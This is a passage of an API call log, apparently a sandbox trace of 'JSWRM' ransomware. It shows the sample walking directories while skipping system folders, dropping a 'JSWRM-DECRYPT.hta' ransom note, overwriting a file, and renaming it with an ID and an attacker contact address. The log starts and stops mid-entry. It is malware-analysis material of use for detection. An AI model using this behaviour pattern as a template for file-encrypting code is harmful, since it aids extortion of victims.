[0067.467] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xface31cd, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0x1edfc584, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="..", cAlternateFileName="")) returned 1 [0067.467] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.467] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.467] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2=".") returned 1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="..") returned 1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="...") returned 1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="windows") returned -1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="recovery") returned -1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="perflogs") returned -1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="documents and settings") returned -1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="$RECYCLE.BIN") returned 1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="system volume information") returned -1 [0067.467] lstrcmpiW (lpString1="DESIGNER", lpString2="msocache") returned -1 [0067.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0067.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0067.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0067.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0067.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0067.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0067.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\designer\\jswrm-decrypt.hta")) returned 0xffffffff [0067.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0067.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0067.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0067.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0067.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0067.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0067.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\designer\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0067.468] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.468] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0067.469] CloseHandle (hObject=0x3d4) returned 1 [0067.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0067.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0067.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0067.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0067.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0067.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0067.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0067.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0067.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\designer\\jswrm-decrypt.hta")) returned 0x20 [0067.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0067.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0067.470] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1edfc584, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0067.470] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.470] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1edfc584, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="..", cAlternateFileName="")) returned 1 [0067.470] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.470] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.470] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1edfc584, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1edfc584, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1edfc584, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.470] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.471] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2=".") returned 1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="..") returned 1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="...") returned 1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="windows") returned -1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="recovery") returned -1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="perflogs") returned -1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="documents and settings") returned 1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="$RECYCLE.BIN") returned 1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="system volume information") returned -1 [0067.471] lstrcmpiW (lpString1="MSADDNDR.OLB", lpString2="msocache") returned -1 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSADDNDR.OLB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSADDNDR.OLB", cchWideChar=12, lpMultiByteStr=0x345f2a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSADDNDR.OLB", lpUsedDefaultChar=0x0) returned 12 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSADDNDR.OLB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSADDNDR.OLB", cchWideChar=12, lpMultiByteStr=0x345f278, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSADDNDR.OLB", lpUsedDefaultChar=0x0) returned 12 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0067.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0067.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0067.473] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=15984) returned 1 [0067.473] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e70) returned 0x24c1d0 [0067.473] ReadFile (in: hFile=0x298, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3e70, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ef6c*=0x3e70, lpOverlapped=0x0) returned 1 [0067.475] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.475] WriteFile (in: hFile=0x298, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3e70, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ef68*=0x3e70, lpOverlapped=0x0) returned 1 [0067.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0067.475] CloseHandle (hObject=0x298) returned 1 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0067.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0067.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f3a8 [0067.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.477] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), lpNewFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0067.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0067.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0067.478] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 0 [0067.478] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0067.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0067.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0067.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0067.478] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3fe1050, ftCreationTime.dwHighDateTime=0x1d5053f, ftLastAccessTime.dwLowDateTime=0xa1b29760, ftLastAccessTime.dwHighDateTime=0x1d4bf28, ftLastWriteTime.dwLowDateTime=0xa1b29760, ftLastWriteTime.dwHighDateTime=0x1d4bf28, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="housewives.exe", cAlternateFileName="HOUSEW~1.EXE")) returned 1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2=".") returned 1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="..") returned 1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="...") returned 1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="windows") returned -1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="recovery") returned -1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="perflogs") returned -1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="documents and settings") returned 1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="system volume information") returned -1 [0067.478] lstrcmpiW (lpString1="housewives.exe", lpString2="msocache") returned -1 [0067.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="housewives.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="housewives.exe", cchWideChar=14, lpMultiByteStr=0x345f610, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="housewives.exe", lpUsedDefaultChar=0x0) returned 14 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="housewives.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="housewives.exe", cchWideChar=14, lpMultiByteStr=0x345f5e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="housewives.exe", lpUsedDefaultChar=0x0) returned 14 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0067.479] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1edfc584, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1edfc584, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1edfc584, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.479] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.479] HeapFree (in: 